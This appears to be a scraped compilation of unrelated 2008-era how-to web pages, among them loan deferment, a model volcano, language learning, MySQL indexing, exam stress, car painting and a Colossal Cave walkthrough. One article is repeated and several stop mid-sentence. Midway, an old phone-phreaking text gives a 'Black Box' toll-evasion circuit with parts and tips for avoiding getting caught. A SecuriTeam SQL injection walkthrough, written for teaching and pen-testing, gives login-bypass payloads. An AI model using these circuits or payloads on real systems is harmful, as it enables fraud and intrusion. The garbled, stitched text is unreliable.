Disclaimer:The content of this page is intended for general informational purposes only and is not a substitute for professional financial advice. Contact your loan administrator or financial aid counselor for more information.Table of Contents:

IntroductionStep 1: Do You Qualify?Step 2: Ask About InterestStep 3: ApplyStep 4: Keep Good Records

Print This Page


Requesting a deferment on your student loans is essentially like asking for an I.O.U. Youpostpone payments on your loan for a period of time, with the promise to resumepayment when you are able, or when your deferment has expired. Whether you are goingback to school or are coping with a loss of income, if you cannot afford your monthlyloan payments deferment can save you from defaulting on your loans—a situation to beavoided at all costs.

Keep reading to learn whether you qualify for deferment and what questions to ask of your lender when applying for one.

Deferment and Forbearance

Keep in mind the differences between deferment and forbearance: both allow you to postpone repaying your loan, but each treats interest differently. If you have subsidized federal loans, interest will not accrue while your loans are deferred. Under the rules of forbearance, interest will accrue regardless of the type of your loan.Thus, if possible, it's better to request a deferment if you qualify.

Step 1: Do You Qualify?

If you are back in school, you will

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How to Make a Model Volcano - Mahalo http://www.mahalo.com/How_to_Make_a_Model_Volcano

1 4 19/4/2008 2:22

How to Make a Model Volcanoby Melissa P

Guide Note:

Wanna a fun, messy and educational project for your kids? Why not try making your own volcano? Nothing makes science more fun than a modestly-sized, safe explosion followed by oozing.

How to Make a Model Volcano will walk you through constructing your own volcano—eruption and all!

Table of Contents:

IntroductionStep 1: Make the Volcano SurfaceStep 2: Assemble the VolcanoVariationsResources


(Creative Commons photo by Scott Robinson)

Whether you're studying volcanoes in school, trying to think of a fun and fascinating science fair project, or simply looking for something entertaining (and educational!) to do on a lazy weekend, you should try your hand at making an erupting model of a volcano!

This project can be as basic or as elaborate as you want it to be, making it an ideal undertaking for all ages, and all of the ingredients and materials are probably already in your home. It also provides a vivid illustration of a simple chemical reaction, which allows kids to see that science can be both fun and accessible. With our easy-to-follow instructions, you'll be dodging lava in no time!

Step 1: Make the Volcano Surface

First, you'll need to make a batch of play dough, which you'll use to form a realistic volcanic surface on yourmodel.


6 cups flour2 cups salt4 tablespoons cooking oil

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How to Learn (But Not Master) Any Language in 1 Hour (Plus: A Fav... http://www.fourhourworkweek.com/blog/2007/11/07/how-to-learn-bu...

1 4 20/4/2008 10:17

The Blog of Tim Ferriss - Experiments in Lifestyle Design

How to Learn (But Not Master) Any Language in 1 Hour (Plus:A Favor)

Written by Tim Ferriss Topics: Filling the Void, Language

Deconstructing Arabic in 45 Minutes

Conversational Russian in 60 minutes?

This post is by request. How long does it take to learn Chinese or Japanese vs. Spanish or Irish Gaelic? I would argue lessthan an hour.

Here’s the reasoning…

Before you invest (or waste) hundreds and thousands of hours on a language, you should deconstruct it. During my thesisresearch at Princeton, which focused on neuroscience and unorthodox acquisition of Japanese by native English speakers, aswell as when redesigning curricula for Berlitz, this neglected deconstruction step surfaced as one of the distinguishing habits ofthe fastest language learners…

So far, I’ve deconstructed Japanese, Mandarin Chinese, Spanish, Italian, Brazilian Portuguese, German, Norwegian, IrishGaelic, Korean, and perhaps a dozen others. I’m far from perfect in these languages, and I’m terrible at some, but I canconverse in quite a few with no problems whatsoever—just ask the MIT students who came up to me last night and spoke inmultiple languages.

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How to exploit MySQL index optimizations at Xaprb http://www.xaprb.com/blog/2006/07/04/how-to-exploit-mysql-index-o...

1 12 10/4/2008 6:33

How to exploit MySQL index optimizationsPublished at July 4, 2006 in SQL. Tags: No Tags.

I’ve written a lot recently about MySQL index and table structure, primary keys, surrogate keys, and related optimizations. In this article I’ll explain how MySQL’s index structures enable an extremelyimportant query optimization, and how that differs between storage engines. I’ll also show you how toknow and predict when the optimization is triggered, how to design tables and queries so it’ll be used,and how to avoid defeating it with poor practices. Plus, I’ll peek a bit into InnoDB internals to show youwhat’s going on behind the scenes.

A review of MySQL’s primary and secondaryindexesYou need to understand how MySQL’s indexes work, and how InnoDB’s are different from other storageengines, such as MyISAM, because if you don’t, you can’t design tables effectively.

The InnoDB storage engine creates a clustered index for every table. If the table has a primary key, that isthe clustered index. If not, InnoDB internally assigns a six-byte unique ID to every row and uses that asthe clustered index. (Moral of the story: pick a primary key of your own — don’t let it generate a uselessone for you).

All indexes are B-trees. In InnoDB, the primary key’s leaf nodes are the data. Secondary indexes have apointer to the data at their leaf nodes. A picture is worth a thousand words, so here’s a diagram of thetable structure I’ll use later on in this article (click through to see it full size):

MyISAM has no clustered index, so the data isn’t physically ordered by any index (it’s in insertionorder), but in InnoDB, the rows are physically ordered by the primary key. That means there can be pagesplits as rows are inserted between other rows — if there are too many rows to fit on a page, the page hasto be split. MyISAM doesn’t have that problem, because rows don’t get stuffed between other rows (theyare added at the end), so a secondary index’s leaf nodes always point directly to the row in the table. Infact, there’s no functional difference between primary and secondary keys in MyISAM. A MyISAMprimary key is simply a unique index named “PRIMARY.”

Here’s a picture of the equivalent table structure, using the MyISAM engine. Notice how different it isfrom InnoDB! This is the same table, it’s just a different storage engine.

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20 easy steps to handle the stress of an upcoming event - Part 3 | Hack ... http://www.hacktheday.com/20-easy-steps-to-handle-the-stress-of-an-...

1 3 24/4/2008 10:15

Hack the DayProductivity, life and computer tips. Tricks for a better day.

20 easy steps to handle the stress of an upcoming event - Part 3

This is the last of a 3 article series on dealing with the stress of an upcoming event. We talk about an exam, but most tips apply to tests, interviews, business meetings.Go read, if you haven’t already, Part 1 - The evening beforeand Part 2 - The morning before

Stress handling during the exam


If blocked out, breatheDon’t panictake a break, think of something elsebreak the writer’s block - write down anythingreread the subjectsunderline the key pointssketch out ideas of solutions

The exam has just started - the test subjects have been given. If you’re prepared and stres s free, go for it, don’t waste useful time.

If not, you might feel blocked out - nothing seems familiar, no idea comes. Stop for a minute or two. Breathe, look around. Try not to think of thesubjects in front of you for a while. Write down your name, age, etc…

Then, slowly, get started reading the subjects. Start copying the requests, underline what seems important. Let the zen mind and spirit come to you.

Even now, don’t rush into it. First read them all and underline the key points of each. Onc e again.

Then, pick whichever looks easier to solve and try to do sketch the solution or steps to it on a side-sheet. Don’t rush into solving it, just think a bit ofhow you could approach it. Then, pick the next in line. See? You already noted a few things down, your brain starts working again. The rest is up to you.


The article has

2 responses

Written by Alex

June 17th, 2007 at 8:03 pm

Posted in life hacks, psychology, tips

« 20 easy steps to handle the stress of an upcoming event - Part 2ZenHabits - 8 Practical Tips to Cure Your Internet ADD (Attention Deficit Disorder) »

2 Responses to '20 easy steps to handle the stress of an upcoming event - Part 3'

Subscribe to comments with RSS or TrackBack to '20 easy steps to handle the stress of an upcoming event - Part 3'.

[…] 20 easy steps to handle the stress of an upcoming event - Part 2 June 17th, 2007 This i s part 2 of a 3 article series on dealing with the stress ofan upcoming event. We talk about an exam, but most tips apply to tests, interviews, busines s meetings. Go read, if you haven’t already, Part 1 -The evening before and, once you’re done with this one, continue with Part 3 - Handling the stress during […]


Learn Meditation EasilyIncrease focus & eliminate stress. Get your Free Meditation CD today!

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20 easy steps to handle the stress of an upcoming event - Part 3 | Hack ... http://www.hacktheday.com/20-easy-steps-to-handle-the-stress-of-an-...

1 3 24/4/2008 10:15

Hack the DayProductivity, life and computer tips. Tricks for a better day.

20 easy steps to handle the stress of an upcoming event - Part 3

This is the last of a 3 article series on dealing with the stress of an upcoming event. We talk about an exam, but most tips apply to tests, interviews, business meetings.Go read, if you haven’t already, Part 1 - The evening beforeand Part 2 - The morning before

Stress handling during the exam


If blocked out, breatheDon’t panictake a break, think of something elsebreak the writer’s block - write down anythingreread the subjectsunderline the key pointssketch out ideas of solutions

The exam has just started - the test subjects have been given. If you’re prepared and stres s free, go for it, don’t waste useful time.

If not, you might feel blocked out - nothing seems familiar, no idea comes. Stop for a minute or two. Breathe, look around. Try not to think of thesubjects in front of you for a while. Write down your name, age, etc…

Then, slowly, get started reading the subjects. Start copying the requests, underline what seems important. Let the zen mind and spirit come to you.

Even now, don’t rush into it. First read them all and underline the key points of each. Onc e again.

Then, pick whichever looks easier to solve and try to do sketch the solution or steps to it on a side-sheet. Don’t rush into solving it, just think a bit ofhow you could approach it. Then, pick the next in line. See? You already noted a few things down, your brain starts working again. The rest is up to you.


The article has

2 responses

Written by Alex

June 17th, 2007 at 8:03 pm

Posted in life hacks, psychology, tips

« 20 easy steps to handle the stress of an upcoming event - Part 2ZenHabits - 8 Practical Tips to Cure Your Internet ADD (Attention Deficit Disorder) »

2 Responses to '20 easy steps to handle the stress of an upcoming event - Part 3'

Subscribe to comments with RSS or TrackBack to '20 easy steps to handle the stress of an upcoming event - Part 3'.

[…] 20 easy steps to handle the stress of an upcoming event - Part 2 June 17th, 2007 This i s part 2 of a 3 article series on dealing with the stress ofan upcoming event. We talk about an exam, but most tips apply to tests, interviews, busines s meetings. Go read, if you haven’t already, Part 1 -The evening before and, once you’re done with this one, continue with Part 3 - Handling the stress during […]


Learn Meditation EasilyIncrease focus & eliminate stress. Get your Free Meditation CD today!

Take control of your lifeLearn a great technique in order to create the life you really want

Page 49: The Instructional Capital volume I

48 49

******--------------------------*******! An AoA Production... !! ^ !! !! “ Handy Telephone Circuits “ !! By: Eye-No Phonez !! !! With Excerpts from: !! “ Phone Color Boxes “ !--------------------------------------- / Try These Psychadelic Boards : X ! ! ! StoneHenge BBS 516-543-7995! ! Skull Island 300B 201-379-1459! ! Crooked Cops 515-225-8795! ! The Logic Center 515-223-WhitNG! X_______________________________/ Circuit #1: Black Box with PushButton and MouthPeice Amp... Neg. RED ______ o___.___._||5mfd__.____________| | | | || | | P | | | / 240 Ohm | H | | |________o o__/X/_. | O | | Norm Free | | N |P.B. o | | E | > --- | | . 6volts----- | | | --- | | | | | | o___._____________________.____|_____| Pos. GREEN This diagram can be interpreted as: P.B = Pushbutton The 6 volt battery can be replaced with either a 9 or 12 volt battery, if you do so, you must also change the resistor value to the following: Batt Res. Value 6v 240 9v 360 12v 480 Make sure you don’t use this on operator orignated calls. Otherwise this particular box plan is VERY VERY safe. When using it, after you answer the party will never know you are therel so you can screen calls that way .. work out a code with your friends who you’ll allow to be Black Boxed, make it so they whistle while it is ringing or something so you know it’s safe when you pick up to hit the pushbutton to kill the ringing. This is very important, if you DON’T hear the signal, DON’T black box that call! You can be nabbed if you mess up. Circuit #2: Put-Person-On-Hold

PhoneLine RED

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How to Adjust to a New Culture

Do some research to understand the culture you are going to. Adjusting to a new environment is frustrating if you know nothing about the place. Find out the typical foods avail-able, what social customs might be at play, and what their perceptions of outsiders are.

Mentally prepare yourself for change. It may seem obvious, but many people move to or visit a different culture and are surprised by how different things are. Even going from one English speaking culture to another, like the United States to Australia, can be overwhelming. Keep your mind open.

Prepare for language differences. If moving to another Eng-lish speaking culture there are still language differences to consider. Learn what these differences are to avoid embar-rassment. Pants, for example, in the UK refer to underwear, not trousers! Try to learn a bit of the language as soon as possible if English isn’t the primary language in your desti-nation country.

Spend time in the community. The fastest and easiest way to adjust to a new culture is to immerse yourself in it. Practice your language skills with strangers and make new friends. Learn about the culture from locals so that you are brought up to speed quickly.

Learn the laws. Or at least learn those laws that don’t apply in your country and may be easy to innocently break. For instance, learn what side of the road to drive on and dis-cover who has the right of way on roads without lights.

How To Paint Parts of a Car | How To Do Things.com http://www.howtodothings.com/automotive/how-to-paint-parts-of-a-car

1 2 13/4/2008 10:17




By vinicius docarmo


How To Paint Parts of a CarEasy Fixes for Your Faded Paint

Fixing the paint job on your car isn't as hard as most people think; it's actually pretty simple. It also

shouldn't cost you a lot (depending upon how much of your car you are painting).

What you will need.

Sandpaper. Buy the kind of sandpaper that can be used with water. I recommend #100.

Primer. Gray primer is the most popular color primer and the easiest to work with.

Paint. Your paint should be in a spray can. You can get the same color as your car by going to the

closest Levine store and giving them your car color code (located on your driver side door on a


Clear coat. Clear coat is the clear shiny stuff that goes on top.

Put on a mask and safety goggles.You should wear a mask and safety goggles to protect

yourself from paint fumes and splatter.


Begin by sanding the part that you will be painting. Use the kind of sandpaper that can be used

with water. You should know even before you start that you really don't need to sand it until you

see metal--just sand it enough until the paint is flat with no shine.


Dampen the sandpaper in the water and begin sanding in a circular motion. Always sand in a

circular motion.


After sanding, look at it and make sure you don't see any shiny spots. Shiny spots indicate that

the paint won't stick. Painting over a shiny spot is a very good way to mess everything up.


Let the parts of your car that you have sanded dry completely. 5.

Now, it's time for priming. You will need one coat of primer and that's it ...... so spray it from

far away and don't let it drip or apply too much.


Now it's time to sand again (but just a little). Get a damp sandpaper and softly sand some of

the primer until you see that it is a really smooth and nice flat color.


Let the parts of your car that you have primed dry completely. 8.

Now you're ready to paint. Get your paint and apply the first coat. Let it dry a little--the first

coat doesn't need to look amazing. (Most of the professionals don't even apply paint on the whole

thing on the first coat.)


After the first coat has dried, just go to the second coat ...now pay a lot of attention because

this is the coat that really counts.


Always apply the paint in an up and down motion. Be sure you don't leave any blank spots.

Let the paint dry and now it's time for the clear coat. Apply a thin coat of clear coat and let it kind

of dry (not all the way though). Now go on and apply a thick coat on top and let it dry.


You just got a new paint job and you did it all by yourself. Congratulations!


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How To Buy a Figure Skating Dress | How To Do Things.com http://www.howtodothings.com/sports-and-recreation/a3205-how-to-b...

1 2 21/4/2008 12:02




By Jacque Tio

Difficulty: Cost:

How To Buy a Figure Skating Dress

Figure skating, whether on the ice or in a roller rink, is often accompanied by

its own crowd of experts in addition to the skaters, judges, and coaches. These

experts may include seasoned parents of a family of figure skaters or local

dressmakers who, more often than not, are skaters themselves or are related

to skaters. Consequently, for those new to the figure skating realm, locating a

good figure skating dress can be accomplished easily.

Figure skating competitions By drawing crowds from all over the community and out of town, figure skating competitions

provide an opportunity for past skaters to sell figure skating dresses and new skaters to acquire them. These sellers also often

provide your skater the opportunity to try on several dresses from a variety of sizes and styles before making a final selection.


Local dressmakers Within a figure skating club at a particular rink, there are usually two or three known dressmakers who can

easily put together a figure skating outfit that fits well. Stretch fabric, the fabric used in swimming suits, is often used for figure

skating dresses and is available at fabric stores such as Hancock Fabrics.


Skating shops Shops within ice and roller rinks that have figure skating clubs often sell figure skating outfits and dresses. These

outfits are usually machine made, however, and may not fit as well as a custom-made dress.


Catalogues or online stores Figure skating outfits are also available through stores for which orders can be placed. This may be

a good first step for buying an outfit, but may lead to the purchase of an over-priced, ill-fitting dress. Online resources can be

found at SkateLog.


Now you know where to find your dress, but how do you choose the right one? The tips below will help you to find the figure skating

dress that is perfect for you:

Good figure skating outfits should fit well, like a one-piece swimsuit. Because the material used is stretch fabric, these

outfits can accommodate many sizes, but they should not be so small as to cause the skater discomfort or too large as to create

loose wrinkles.


One can often tell the quality of a dress by its skirt. The skirt should not be too short or too long for a figure skating dress.

(Longer or shorter skirts may be aesthetically desired for competition dresses.) A well-fitted skirt is often ¾ to 1 in. longer than

the seam of the bottom of the skating outfit and creates nicely folded ripples in a V-shaped pattern around the skater. Its length

should be relatively consistent, with the skirt riding higher at the hips than the front or back. The tip of the skirt pointing

downward at the back should also be shorter than that of the front.


The quality of the fabric can be judged by its stretchiness in both directions. Make sure the fabric does not stretch in only

one direction. If the stretch fabric or spandex material used only stretches in one direction, it is better for the material to stretch

lengthwise rather than widthwise.


Pre-owned figure skating dresses should be analyzed for any stains or rips. Figure skating dresses are very durable and

are exchanged for new ones because of their size rather than their condition. Stains and rips, however, may still be present

especially given the nature of the fabric which is usually sensitive to velcro or rough materials.


The design of the figure skating dress should fit the tastes of the skater. It is the skater who will be wearing it for

numerous practices and lessons to come.


Quick Tips:

The best deals in figure skating outfits may be found in your very own neighborhood by locating past figure skaters who usually

have several outfits in good condition and are looking to get rid of them more than to sell them.For those handy with a sewing machine and looking to save money, figure skating dress patterns are available at local fabric stores.

Competition dresses are usually much higher priced based on the beadwork or specialty designs involved. Often, a plain figure


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MicroSpell Help - How To: Step-by-Step http://www.microspell.com/man/HowTo.htm

1 13 20/4/2008 3:08

Simple and Efficient Spell Checking

How to Check Multiple Documents (and Navigate Among Them)

How to Automatically Check a Linked Group of HTML or TeX Documents

How to Deal with a Large Number of Suspects

How to Check and Correct a Large Number of Files

How to Check Text in Other Windows (WordPad, Web pages, E-mail, etc.)

How to Check Text on the Clipboard

How to Use the Replace/Lookup Dialog to Modify Dictionaries: Finding, Adding, and RemovingWords

How to Create a New Dictionary

How to Look Up Definitions, Synonyms, and Spellings Via the Internet

Some Simple But Useful Tips

How to highlight words in the Inbox and Outbox

How to stop a spell check without saving your document to disk

How to conveniently arrange the speller's windows on your screen

How to adjust your Inbox and Outbox column widths

How to find the Outbox if it gets covered by the Inbox (or vice versa)

How to make auto-corrections truly automatic

How to save a word in any user dictionary from the Inbox or Outbox

See Also: Tips and Techniques

[Help Contents]

Simple and Efficient Spell Checking (Via the Inbox)

Using MicroSpell's Spell Check dialog, you can check your document one-word-at-a-time as invirtually all other spell checkers. While this is simple, it is not as efficient as it could be. Werecommend you try the alternative outlined here, especially if your documents typically containmany suspect words.

Don't be overwhelmed by MicroSpell's many options and commands. We've set reasonable defaultsfor the options and you can ignore most of the commands until you need them. As the next fewparagraphs show, all you really need to know is how to open your document, correct themisspellings, and press the Done button. (For additional details, you can read the Inbox topic.)

Here's how to spell check a document using the Inbox. This method is simple, yet arguably the bestapproach when the number of unrecognized words is small or moderate, say fewer than about 200.(If you have many hundreds or thousands of suspects, see How to Deal with a Large Number of Suspects for some advice.)

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Make your own Borromean rings! (You know you want to.) - Instructa... http://www.instructables.com/id/Make-your-own-Borromean-rings-Y...

1 2 12/4/2008 6:43

next step »

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Apr 12, 2008. 5:30 AM

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Apr 12, 2008. 6:00 AM

Apr 11, 2008. 3:59 PM

Make your own Borromean rings! (You know you want to.)by maplesyrup on Apr 11, 2008 in CRAFT & OFFBEAT email it!

intro Make your own Borromean rings! (You know you want to.)This is an instructable showing you how to crochet your very own Borromean rings.

You could also also make the outside by knitting or sewing a tube if you wanted. I crocheted them as I thought knitting may be too stretchy and sewn ones would take some refining before they stopped being all wrinkly and untidy looking.

Borromean rings are a knot (in the mathematical sense) where the three rings cannot be separated even though no two rings are linked. Also the space in the centre is in the shape of a Reuleaux triangle - a shape of constant diameter but inconstant radius.

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i can't wait to make one of these for the 2yo great niece. and my father in law the retired mathteacher is gonna love it! thanks maplesyrup! this is "sweet"!

ha maplesyrup = sweet xd

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How to Act Like a Princess

You don’t have to be born to a king and queen to act like a princess. You just have to adopt some of the mannerisms, dress like royalty and expect some of the entitlements given to the king’s daughter. Get out your tiara, and start acting like the spoiled princess that you are.

Step 1:Expect people to want to do things for you. Guys should stand when you enter a room, and the girls should back off to give you the best seat. Everyone wants to be near you because you carry yourself with an air of sophistication and grace. You seem so exciting to them, and they want to follow you.

Step 2:Hint at the parties and the adoring fans who follow you everywhere. Do this without any bragging or conceit. Your dress and manners can convey your position because you are courteous to everyone, and your clothes are always clean and stylish.

Step 3:Write about your adventures in princess land everyday. Tell your di-ary every detail. This keeps you in the mood. Sustain an attitude of royalty until it becomes second nature.

Step 4:Walk with your head held a little high. Pretend that every entry is on a red carpet, and carry yourself with dignity.

Step 5:Be kind and generous to others, especially the less fortunate. Always listen to others and respect their feelings. Let younger girls try on your tiara. Share your time with people who are not in your league. This can help develop your ultimate standing as a princess in the eyes of your friends.

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Adventure - The Colossal Cave

1. Enter building. Get keys and lamp. The lamp appears here should you have to be reincarnated.2. Unlock gate (with key). Get cage.3. Try the magic word, XYZZY. Try it again. Get rod.4. Drop rod. Get bird. Get rod.5. Wave rod. Drop rod. Go get diamonds and gold.6. Release bird. Drop cage. Grab coins and silver. Note: Dwarves are lousy shots, but sometimes, unfortunately, they can get lucky. Carry the ax, as you may encounter up to five of these critters.7. Try the magic word PLUGH also. Drop silver, gold nugget, diamonds, jewelry, and coins. If you haven’t already, you will soon encounter a thieving pirate. Not to worry, he’s got to rob you at least once if you’re to win all the marbles.8. Carrying food, ax, bottle of water, key (all for later) and lantern, visit the software den (Microsoft Version only). Don’t mess with anything--Software types are a weird lot. Get magic word LWPI. Works only from here.9. Water plant twice. Get water for the second pass at the waterfall.10. Attack dragon. Yes. Get rug.11. Get oil (in now empty bottle). Climb the plant.12. Oil door. Open door. Drop bottle. While here and while carrying golden eggs, enter FEE, FIE, FOE, FOO, one word at a time. Check your inventory. Go back to where you first found the eggs.13. Throw eggs (to troll). Cross bridge before the FEE, FIE, whatever.14. Feed bear. Unlock chain (with key). Get golden chain. Drop key. Get bear. Don’t forget the rare spices. At volcano view, read and remember the words of fire.15. Release bear. Don’t try crossing the bridge with him on the chain.16. Open oyster (with trident). Pearl will roll down into the cul-de-sac.17. Insert coin to get a replacement battery for your lamp, if necessary. Coins are a treasure, however, and you won’t ge them back, so try beating the game with the original batteries only.18. Never drop vase unless you have already dropped the pillow.19. Drop everything in order to enter. Get emerald.20. Say PLOVER. Get pyramid. PLOVER, PLUGH and pi-tooie!21. You must traverse the maze to get Pirate’s Treasure Chest, which doesn’t appear until he’s robbed you. Return via the Pit and XYZZY. Drop all treasures in the House.22. Drop magazine in Witt’s End for a point. Get out by entering all different directions except north. It may take a while. Slog around in various and distant locations until a voice announces that the cave is now closed. At this point you are teleported to the two-room Master’s Game.23. Get black rod (with the rusty marks, not the star). Drop rod in the northeast room. Retreat to the southwest room. Type blast. Alternate endings are possible, but will not yield sufficient points to earn you the rank of adventure grandmaster.

Treasure ListWhat WhereGolden Eggs Giant RoomTrident Magnificent CanyonPearl Clam RoomPirate’s Chest Pirate’s MazePlatinum Pyramid Dark RoomEmerald Plover RoomMing Vase (and Pillow) Oriental RoomRare Spices Chamber of BouldersPersian Rug Dragon’s DenGolden Chain Bear’s ChamberDiamonds West Side of FissureJewelry South Side ChamberGold Nugget Gold RoomSilver Bars North-South PassageCoins West Side Chamber

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How to Do Nothing - wikiHow http://www.wikihow.com/Do-Nothing

1 3 18/4/2008 11:14



How to Do Nothing

For those of us who are non-stop workaholics, doing nothing can actually be pretty difficult! If you're like the Energizer bunnyin that you keep going, and going, and going, here's how to stop once in a while, think pleasant thoughts, visit the beach,stare at the water, and just do nothing.

StepsPlan ahead. Whether it's an hour, a day, a week, a month, or a year of doing nothing, cancel all of your appointments forthat block of time. Try to pick the most boring week or day, a day where you'll most likely sleep most of the time.


Let people know.Tell everyone that you're going to be "busy" and will be unavailable. Whether you choose to tell them that you're actuallysetting aside some time to do nothing, or you just give them the vague explanation "I'm going to be busy" (busy doingnothing!), tell them not to call, visit, or interrupt unless it's a real emergency.


Find a quiet, private place.Go somewhere you don't feel pressured to do anything. This might be your bedroom, the backyard, or a local park. Findthat place and go there.


Set your alarm. Set an alarm of some kind to go off when your "nothing" time is over, so that you don't have to constantlylook at the clock and count the minutes.


Turn off the phone.Turn off your cell phone, work phone, pager, PDA, Blackberry, computer,Beeper,Radio,Tv and any other means of sendingor receiving calls or messages. These distractions will only keep you from enjoying the nothing.


Sit by yourself.Feel the wind, the sun on your face, the chair touching your bottom. Listen to the rustle of the trees, birds chirping, waterflowing. Never think about the past or future. Avoid the temptation to turn on the TV, listen to music, write a note toyourself, get a bite to eat, or anything else. The only thing you should do is go to the bathroom (if needed).


Learn how to free your mind.Clear your mind of all thoughts of work, worries, family, etc. by simply letting them go. Doing this not only allows your bodyto do nothing, but your mind as well. However, do not be worried if you find yourself thinking of things. Freeing up one'smind is actually very difficult to master, and often requires more discipline than some free time (Buddhist monks, forexample, dedicate their entire lives to freeing their minds).


TipsSetting aside some free time to do nothing on a regular basis is very healthy for your mind, body, and emotional life,especially if you find that you're really wearing yourself thin. Often times, we are encouraged by the actions of ourfast-paced, high-information society to believe that staying busy is a normal and natural state of existence. Remember,there is no guilt in giving yourself some private downtime. How often you do nothing is up to you, but it should be arejuvenating experience.

Once you become good at doing nothing, you can use this newfound time and energy to think of things, instead. Thiswould not be doing "nothing," but thinking while shutting out the world. Focusing on one thing this way will help you toconcentrate better than having your mind zoom over a million thoughts a minute.

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How To Avoid Getting Salmonella | eHow.com http://www.ehow.com/how_2126452_avoid-getting-salmonella.html

1 2 22/4/2008 4:21

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How to Avoid Getting SalmonellaBy eHow Health Editor

Rate: (1 Ratings)

Outbreaks of salmonella seem like they are in the news weekly; these cases of mass sickness from salmonella can be difficult to avoid. However, with some simple steps, salmonella can be avoided in the home and workplace. Salmonella poisoning and food poisoning in general most often happen due to careless preparation of foods.

Start by thoroughly washing hands after using the toilet and beforehandling any food. This simple step will prevent most cases of salmonella.The salmonella bacteria live in the intestinal tract of humans and animals.

Wash all food preparation areas carefully. Cross contamination of rawfoods occurs whenever food is prepared. Extra caution must be observed when handling meat of any kind. Wash the meat as well with warm water.

Avoid salmonella from eggs. Eggs and raw meat are the two mostcommon sources of salmonella poisoning. Throw away any cracked eggs.If an egg shell feels slimy, it is probably contaminated with bacteria and

should be tossed into the trash. Clean each egg with warm water and mild soap,and rinse the eggs to remove the soap.

Stay away from large special food events such as public holidaycelebrations and picnics. The food for these events can sometimes be prepared hastily. If a piece of meat or egg-based dish looks or smells

funny, do not eat it.

Get rid of pets, especially reptiles. Reptiles, such as lizards, are notoriousfor spreading salmonella. Do not pet animals, especially ones with diarrhea, before preparing food or eating.

Detection of SalmonellaSpecific, fast and reliable Easy-to-use technologywww.vermicon.com

Is It a Stomach Virus?Stomach virus symptoms, causes, how to get fast relief.www.HealthInfoArticles.com

Fibrofiltre Anti-microbiaEliminates bacteria, viruses fungous and parasites.www.fibrofiltre.com

Egg donationIndividual donor for each recipient Fresh embryo transferwww.avapeter.com


Avoiding Salmonella from EggsCDC Information on Salmonella

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SecuriTeam™ - SQL Injection Walkthrough http://www.securiteam.com/securityreviews/5DP0N1P76E.html

1 6 10/4/2008 10:18

Audit your web server for security holes - see what the hackers see.

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SQL Injection Walkthrough 26 May 2002

SummaryThe following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques, to successfully utilize them, and to protect themselves from such attacks.

Credit:The information has been provided by SK.

Details1.0 IntroductionWhen a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

1.1 What is SQL Injection?It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

1.2 What do you need?Any web browser.

2.0 What you should look for?Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>

Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).

2.1 What if you can't find any page that takes input?You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:


3.0 How do you test if it is vulnerable?Start with a single quote trick. Input something like:

hi' or 1=1--

Into login, or password, or even in the URL. Example: - Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://duck/index.asp?id=hi' or 1=1--

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:

<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>

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epicblog» Blog Archive » Nikon D200 GPS - Version 2 http://www.rickwargo.com/2008/02/24/nikon-d200-gps-version-2/

1 11 19/4/2008 3:58



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Nikon D200 GPS - Version 2

GPS, OSI, WILTRick WargoFebruary 24th, 2008 - 03:03am

I’ve had it for quite a while and love it: a new and improved of my original GPS design for my D200. This time it’s smaller,practical and easy; just mount it on the flash shoe, plug it in to the 10-pin connector and turn it on! Within no time at all GPS coordinates will be flowinginto the camera.

This version eliminates the need for the expensive MC-35 and even the special 10-pin connec tor. I’ve opted for a quick GPS receiver and encasedeverything in a small black box with a flash shoe mount. Because it is powered through the camera’s power source, a switch on the side of the box turnsoff the GPS. Version 3 should include a battery, rechargeable through a USB connection.

Read on for directions on how to create your own GPS.

Parts List

4.7Kohm resistor (x 2)1.10Kohm resistor2.2.2Kohm resistor3.NPN Transistor4.IC PC Board5.SPST Micromini Toggle Switch6.3×2x1 Project Enclosure Box7.USGloblSat EM-406A GPS8.Remote Cord for Nikon D200 - find a cheap (<$10) one on eBay9.Small cable ties10.Velcro with a sticky mount11.Epoxy stick12.

Tools Needed

Soldering iron & solder1.Wire cutters2.Needlenose pliers3.Exacto knife4.Patience5.

OverviewIt’s quite a simple project; just four resistors, a capacitor, the GPS, a switch and some soldering. The goal is to make it tight so it fits in a small enclosurethat can be mounted on the camera. I prefer to do a dry run without any soldering to see ho w it all fits together; I would suggest you do the same.

DisclaimerAlthough I have used this successfully with my camera, I cannot guarantee that it will not harm your camera, even if all directions are followed exactly. By constructing this GPS following these directions (or even using them as a basis for your own project), you do so at your own risk and agree to hold me harmless from any damage done to your camera.

Wiring Diagram

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How to Download Free Music - Mahalo http://www.mahalo.com/How_to_Download_Free_Music

1 9 19/4/2008 2:47

How to Download Free MusicGuide Note: Everybody likes Music and everybody likes Free stuff. Put them together and you have Free Music

! If you're tired of spending all your money trying to keep up with the latest trends in music, take a look at some of our tips and tricks for How to Download Free Music.

Table of Contents:

IntroductionStep 1: Figure Out What You WantStep 2: Search MP3 BlogsStep 3: Use Google To Find MusicStep 4: Search Retail MP3 SitesStep 5: Official Site and MySpaceStep 6: Using Bit-TorrentStep 7: Peer-to-Peer DownloadsOther Free Music Resources


